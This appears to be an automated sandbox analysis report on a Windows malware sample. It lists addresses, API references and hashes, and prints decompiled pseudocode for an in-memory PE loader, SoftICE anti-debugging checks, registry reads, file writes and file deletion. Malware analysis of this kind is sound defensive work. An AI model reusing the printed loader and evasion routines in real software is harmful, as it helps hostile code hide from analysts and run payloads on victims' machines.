                                    0x00455d97
                                    0x00455d9d
                                    0x00455da0
                                    0x00455da0
                                    0x00455da0
                                    0x00455da4
                                    0x00455da5
                                    0x00455daa
                                    0x00455dad
                                    0x00455dae
                                    0x00455db2
                                    0x00455db2
                                    0x00455db4
                                    0x00455db4
                                    0x00455db8
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc03
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc2c
                                    0x0040bc31
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000
                                    0x0040be60
                                    0x00455c8f
                                    0x00000000
                                    0x00455c8f
                                    0x00455c53
                                    0x00455c55
                                    0x00455c58
                                    0x00455c5a
                                    0x00000000
                                    0x00000000
                                    0x00455c5c
                                    0x00455c5c
                                    0x00455c5d
                                    0x00455c5f
                                    0x00455c61
                                    0x00455c63
                                    0x00455c66
                                    0x00455c66
                                    0x00455c68
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c4f
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c39

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00455D52
                                    • GetProcAddress.KERNEL32(?,0044FFF9), ref: 00455D67
                                    • ExitProcess.KERNEL32(?,0044FFF9), ref: 00455D78
                                    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,7479411C), ref: 00455D95
                                    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 00455DAA
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction ID: 60ef33331dc92bd8925b533821660d0d47773761dcb7daf1aaa77766f171e575
                                    • Opcode Fuzzy Hash: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction Fuzzy Hash: 2E511A72951B124BD7214EB89CE46B577A4EB12336728073ACDE1C73C7E7A8580E8758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403EC0, Relevance: 7.7, APIs: 5, Instructions: 177memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E00403EC0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				signed int _v52;
				long _v56;
				char _v60;
				void* _t116;
				void* _t121;
				void* _t135;
				intOrPtr _t138;
				void* _t150;
				void* _t175;
				signed int _t184;
				signed int _t185;
				intOrPtr _t189;
				intOrPtr _t197;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t209;
				signed int _t210;
				void* _t213;
				void* _t216;
				intOrPtr* _t217;

				_t208 = __edi;
				_t215 = _t216;
				_t217 = _t216 + 0xffffffc8;
				_push(__edi);
				_v44 = __ecx;
				_t183 = __edx;
				_v40 = __eax;
				_t197 =  *0x4037bc; // 0x4037c0
				E0040242C( &_v36, _t197);
				_push(_t216);
				_push(0x4040ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_push(0);
				_push(_v44);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
				_t116 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1); // executed
				_v16 = _t116;
				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
				_t121 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4); // executed
				_v48 = _t121;
				E00401258(_v44,  *(_v8 + 0x54), _v48);
				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56); // executed
				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t135 >= 0) {
					_v60 = _t135 + 1;
					_t185 = 0;
					do {
						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
						if(_t208 < _v52) {
							_t210 = _t208 ^ _v52;
							_v52 = _v52 ^ _t210;
							_t208 = _t210 ^ _v52;
						}
						_t175 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4); // executed
						_v48 = _t175;
						E00401414(_v48, _t208);
						E00401258( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
						_t185 = _t185 + 1;
						_t66 =  &_v60;
						 *_t66 = _v60 - 1;
					} while ( *_t66 != 0);
				}
				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
				_v28 = _t138;
				_v24 = _t138;
				_v36 = _v16;
				_v32 =  *(_v8 + 0x50);
				_push(0);
				E00402FBC();
				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
					E00403D08(_t145 + _v16, _t215);
				}
				_t147 =  *((intOrPtr*)(_v8 + 0x80));
				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
					E00403D84(_t147 + _v16, _t183, _t208, _t213, _t215); // executed
				}
				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t150 >= 0) {
					_v60 = _t150 + 1;
					_t184 = 0;
					do {
						_t209 = _t184 + _t184 * 4;
						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E00403C98( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56); // executed
						_t184 = _t184 + 1;
						_t101 =  &_v60;
						 *_t101 = _v60 - 1;
					} while ( *_t101 != 0);
				}
				_t189 =  *0x4037bc; // 0x4037c0
				E00402704(_a4, _t189,  &_v36);
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(E004040C1);
				_t205 =  *0x4037bc; // 0x4037c0
				return E004024F0( &_v36, _t205);
			}


































                                    0x00403ec0
                                    0x00403ec1
                                    0x00403ec3
                                    0x00403ec8
                                    0x00403ec9
                                    0x00403ecc
                                    0x00403ece
                                    0x00403ed4
                                    0x00403eda
                                    0x00403ee1
                                    0x00403ee2
                                    0x00403ee7
                                    0x00403eea
                                    0x00403ef2
                                    0x00403ef3
                                    0x00403efa
                                    0x00403efe
                                    0x00403f05
                                    0x00403f17
                                    0x00403f1c
                                    0x00403f28
                                    0x00403f3d
                                    0x00403f42
                                    0x00403f51
                                    0x00403f67
                                    0x00403f79
                                    0x00403f82
                                    0x00403f85
                                    0x00403f88
                                    0x00403f8b
                                    0x00403f8d
                                    0x00403f90
                                    0x00403f9b
                                    0x00403fa1
                                    0x00403fa3
                                    0x00403fa6
                                    0x00403fa9
                                    0x00403fa9
                                    0x00403fbf
                                    0x00403fc4
                                    0x00403fce
                                    0x00403fe3
                                    0x00403fe8
                                    0x00403fe9
                                    0x00403fe9
                                    0x00403fe9
                                    0x00403f8d
                                    0x00403ff4
                                    0x00403ff7
                                    0x00403ffa
                                    0x00404000
                                    0x00404009
                                    0x0040400c
                                    0x0040401c
                                    0x00404027
                                    0x0040402f
                                    0x00404035
                                    0x0040403a
                                    0x0040403e
                                    0x00404046
                                    0x0040404c
                                    0x00404051
                                    0x00404059
                                    0x0040405c
                                    0x0040405f
                                    0x00404062
                                    0x00404064
                                    0x00404068
                                    0x00404082
                                    0x00404087
                                    0x00404088
                                    0x00404088
                                    0x00404088
                                    0x00404064
                                    0x00404093
                                    0x00404099
                                    0x004040a0
                                    0x004040a3
                                    0x004040a6
                                    0x004040ae
                                    0x004040b9

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00403F17
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F3D
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F67
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403FBF
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 00404082
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction ID: b04bee7947df74310e6e8ccd123ea0b1f62a61930ae828744bf4897096846573
                                    • Opcode Fuzzy Hash: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction Fuzzy Hash: C371D475A00208AFCB10DFA9D981EAEB7F8FF48314F15856AE905F7391D634EA04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406088, Relevance: 6.1, APIs: 4, Instructions: 83registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E00406088(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				long _t35;
				long _t46;
				intOrPtr _t66;
				void* _t72;
				char* _t73;
				void* _t76;

				_v12 = __ecx;
				_v8 = __edx;
				_t72 = __eax;
				_t60 = _a4;
				E00401F38(_v8);
				E00401F38(_v12);
				E00401F38(_a8);
				_push(_t76);
				_push(0x406167);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76 + 0xffffffec;
				E00401B14(_a4, _a8);
				_t35 = RegOpenKeyExA(_t72, E00401F48(_v8), 0, 1,  &_v16); // executed
				if(_t35 == 0) {
					_t73 = E00401F48(_v12);
					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
					if(_t46 == 0) {
						E00402074(_t60, _v24);
						RegQueryValueExA(_v16, _t73, 0,  &_v20, E00401F48( *_t60),  &_v24); // executed
						E00402074(_t60, _v24 - 1);
					}
					RegCloseKey(_v16); // executed
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(E0040616E);
				E00401AE4( &_v12, 2);
				return E00401AC0( &_a8);
			}














                                    0x00406090
                                    0x00406093
                                    0x00406096
                                    0x00406098
                                    0x0040609e
                                    0x004060a6
                                    0x004060ae
                                    0x004060b5
                                    0x004060b6
                                    0x004060bb
                                    0x004060be
                                    0x004060c6
                                    0x004060dd
                                    0x004060e4
                                    0x004060fa
                                    0x00406101
                                    0x00406108
                                    0x0040610f
                                    0x0040612b
                                    0x00406136
                                    0x00406136
                                    0x0040613f
                                    0x0040613f
                                    0x00406146
                                    0x00406149
                                    0x0040614c
                                    0x00406159
                                    0x00406166

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction ID: 0e00d036d103dc2b2ef1cfb5c67197bce49365ef8cbb96d3ced269820940c9d9
                                    • Opcode Fuzzy Hash: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction Fuzzy Hash: 3021E075A00109BBDB00EBA9CC82EAE77BCEF49354F504176B914F72D1D778AE058764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D70, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00405D70(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				void* _t17;
				void* _t28;
				intOrPtr _t33;
				long _t36;
				void* _t39;

				_t36 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00401F38(_v8);
				E00401F38(_v12);
				_push(_t39);
				_push(0x405e0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39 + 0xfffffff4;
				_t17 = CreateFileA(E00401F48(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
				_t28 = _t17;
				if(_t28 != 0xffffffff) {
					if(_t36 == 0xffffffff) {
						SetFilePointer(_t28, 0, 0, 0);
					}
					WriteFile(_t28, E00401F9C( &_v12), _t36,  &_v16, 0); // executed
					CloseHandle(_t28); // executed
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E00405E11);
				return E00401AE4( &_v12, 2);
			}











                                    0x00405d78
                                    0x00405d7a
                                    0x00405d7d
                                    0x00405d83
                                    0x00405d8b
                                    0x00405d92
                                    0x00405d93
                                    0x00405d98
                                    0x00405d9b
                                    0x00405db6
                                    0x00405dbb
                                    0x00405dc0
                                    0x00405dc5
                                    0x00405dce
                                    0x00405dce
                                    0x00405de4
                                    0x00405dea
                                    0x00405dea
                                    0x00405df1
                                    0x00405df4
                                    0x00405df7
                                    0x00405e09

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction ID: 55d088da9265c3b5ae2f525a133c65af5c973924d17bad78a6645e8f940914b1
                                    • Opcode Fuzzy Hash: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction Fuzzy Hash: F1116D70A407047AE720BB75CC83F9F76ACDB05728FA04677B510B62E2DA786E00896C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405850() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}





                                    0x00405851
                                    0x0040586a
                                    0x00405872
                                    0x00405875
                                    0x0040587a
                                    0x0040587a
                                    0x0040587f

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040586A
                                    • CloseHandle.KERNEL32(00000000,\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\NTICE
                                    • API String ID: 3498533004-2502798147
                                    • Opcode ID: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction ID: dcdfadaa743e4582149ecbcd816e92e043e7093f062ec94bd67b511fcc83bcd2
                                    • Opcode Fuzzy Hash: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction Fuzzy Hash: 27D0CAB238170039F83438A92C97F1A440C9701B29EA0833ABB20BA1E1C4A8AA29021C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405814, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405814() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}





                                    0x00405815
                                    0x0040582e
                                    0x00405836
                                    0x00405839
                                    0x0040583e
                                    0x0040583e
                                    0x00405843

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040582E
                                    • CloseHandle.KERNEL32(00000000,\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405839
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\SICE
                                    • API String ID: 3498533004-948585333
                                    • Opcode ID: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction ID: 3ad54f1ae86a7dc7f46777f6809a8286594d703ee9eb335483981d0cf1385b1e
                                    • Opcode Fuzzy Hash: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction Fuzzy Hash: B8D012723C170039F83038A51C97F07400C5701B2DEB08336BB10BD1E1C4F8B619051C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405A28, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 52%
                                    			E00405A28(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				int _t24;
				intOrPtr _t36;
				intOrPtr _t37;
				CHAR* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t45 = __eflags;
				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_push(__ebx);
				_v8 = __eax;
				E00401F38(_v8);
				_push(_t42);
				_push(0x405ac7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_v9 = 0;
				_t13 = E00405D04(_v8, __ebx, _t45); // executed
				if(_t13 != 0) {
					_push(_t42);
					_push(0x405aa7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					_t40 = E00401F48(_v8);
					GetFileAttributesA(_t40); // executed
					SetFileAttributesA(_t40, 0); // executed
					_t24 = DeleteFileA(_t40); // executed
					asm("sbb eax, eax");
					_v9 = _t24 + 1;
					_pop(_t37);
					 *[fs:eax] = _t37;
				}
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00405ACE);
				return E00401AC0( &_v8);
			}














                                    0x00405a28
                                    0x00405a29
                                    0x00405a2b
                                    0x00405a2e
                                    0x00405a31
                                    0x00405a37
                                    0x00405a3e
                                    0x00405a3f
                                    0x00405a44
                                    0x00405a47
                                    0x00405a4a
                                    0x00405a51
                                    0x00405a58
                                    0x00405a5c
                                    0x00405a5d
                                    0x00405a62
                                    0x00405a65
                                    0x00405a70
                                    0x00405a73
                                    0x00405a89
                                    0x00405a8f
                                    0x00405a97
                                    0x00405a9a
                                    0x00405a9f
                                    0x00405aa2
                                    0x00405aa2
                                    0x00405ab3
                                    0x00405ab6
                                    0x00405ab9
                                    0x00405ac6

                                    APIs
                                      • Part of subcall function 00405D04: FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                      • Part of subcall function 00405D04: FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A73
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A89
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A8F
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
